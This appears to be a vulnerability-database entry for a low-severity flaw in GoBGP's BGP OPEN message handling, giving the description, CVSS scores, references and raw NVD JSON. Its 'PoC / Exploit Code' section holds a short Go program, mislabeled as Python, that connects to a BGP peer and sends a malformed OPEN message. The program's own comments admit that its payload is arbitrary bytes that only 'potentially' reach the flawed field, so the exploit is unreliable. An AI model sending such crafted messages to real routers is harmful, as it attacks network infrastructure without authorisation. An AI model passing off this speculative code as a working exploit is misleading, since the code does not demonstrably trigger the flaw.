CVE-2026-5122

Description

A security flaw has been discovered in osrg GoBGP up to 4.3.0. This affects the function DecodeFromBytes of the file pkg/packet/bgp/bgp.go of the component BGP OPEN Message Handler. Performing a manipulation of the argument domainNameLen results in improper access controls. The attack may be initiated remotely. A high degree of complexity is needed for the attack. The exploitability is reported as difficult. The patch is named 2b09db390a3d455808363c53e409afe6b1b86d2d. It is suggested to install a patch to address this issue.

CVSS Details

CVSS Score

3.7

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:osrg:gobgp:*:*:*:*:*:*:*:* - VULNERABLE

osrg GoBGP <= 4.3.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

package main

import (
	"fmt"
	"net"
)

// PoC for CVE-2026-5122: GoBGP DecodeFromBytes vulnerability
// This PoC demonstrates sending a crafted BGP OPEN message
// to trigger the improper access control in DecodeFromBytes.
func main() {
	target := "127.0.0.1:179" // Replace with target IP
	conn, err := net.Dial("tcp", target)
	if err != nil {
		fmt.Println("Connection failed:", err)
		return
	}
	defer conn.Close()

	// BGP Marker (16 bytes of 1s)
	marker := make([]byte, 16)
	for i := range marker {
		marker[i] = 0xFF
	}

	// BGP Header Length: 29 (Example)
	length := []byte{0x00, 0x1D}

	// BGP Message Type: 1 (OPEN)
	msgType := []byte{0x01}

	// BGP Version: 4
	version := []byte{0x04}

	// My AS: 100
	myAS := []byte{0x00, 0x64}

	// Hold Time: 180
	holdTime := []byte{0x00, 0xB4}

	// BGP Identifier
	bgpID := []byte{0x01, 0x02, 0x03, 0x04}

	// Optional Parameter Length
	// Manipulating this to potentially affect domainNameLen logic
	optParmLen := []byte{0x08}

	// Malformed Optional Parameters payload
	payload := append(marker, length...)
	payload = append(payload, msgType...)
	payload = append(payload, version...)
	payload = append(payload, myAS...)
	payload = append(payload, holdTime...)
	payload = append(payload, bgpID...)
	payload = append(payload, optParmLen...)
	// Append arbitrary data to simulate the malformed argument
	payload = append(payload, 0xAA, 0xBB, 0xCC, 0xDD, 0xEE, 0xFF, 0x01, 0x02)

	_, err = conn.Write(payload)
	if err != nil {
		fmt.Println("Send failed:", err)
		return
	}
	fmt.Println("Malformed BGP OPEN message sent.")
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-5122
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-5122
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-5122/
[4] VulDB https://vuldb.com/cve/CVE-2026-5122
[5] https://github.com/osrg/gobgp/
[6] https://github.com/osrg/gobgp/commit/2b09db390a3d455808363c53e409afe6b1b86d2d
[7] https://github.com/osrg/gobgp/pull/3343
[8] https://vuldb.com/submit/780124
[9] https://vuldb.com/vuln/354154
[10] https://vuldb.com/vuln/354154/cti

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-5122", "sourceIdentifier": "[email protected]", "published": "2026-03-30T15:16:35.947", "lastModified": "2026-04-08T16:07:36.650", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in osrg GoBGP up to 4.3.0. This affects the function DecodeFromBytes of the file pkg/packet/bgp/bgp.go of the component BGP OPEN Message Handler. Performing a manipulation of the argument domainNameLen results in improper access controls. The attack may be initiated remotely. A high degree of complexity is needed for the attack. The exploitability is reported as difficult. The patch is named 2b09db390a3d455808363c53e409afe6b1b86d2d. It is suggested to install a patch to address this issue."}, {"lang": "es", "value": "Una falla de seguridad ha sido descubierta en osrg GoBGP hasta la versión 4.3.0. Esto afecta a la función DecodeFromBytes del archivo pkg/packet/bgp/bgp.go del componente Gestor de Mensajes BGP OPEN. Realizar una manipulación del argumento domainNameLen resulta en controles de acceso inadecuados. El ataque puede ser iniciado de forma remota. Se necesita un alto grado de complejidad para el ataque. La explotabilidad se reporta como difícil. El parche se llama 2b09db390a3d455808363c53e409afe6b1b86d2d. Se sugiere instalar un parche para abordar este problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "baseScore": 2.6, "accessVector": "NETWORK", "accessComplexity": "HIGH", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 4.9, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-266"}, {"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:osrg:gobgp:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.4.0", "matchCriteriaId": "05DBB6FD-F3CD-4BF0-A573-D1E87307A50F"}]}]}], "references": [{"url": "https://github.com/osrg/gobgp/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/osrg/gobgp/commit/2b09db390a3d455808363c53e409afe6b1b86d2d", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/osrg/gobgp/pull/3343", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://vuldb.com/submit/780124", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/vuln/354154", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/vuln/354154/cti", "source": "[email protected]", ... (truncated)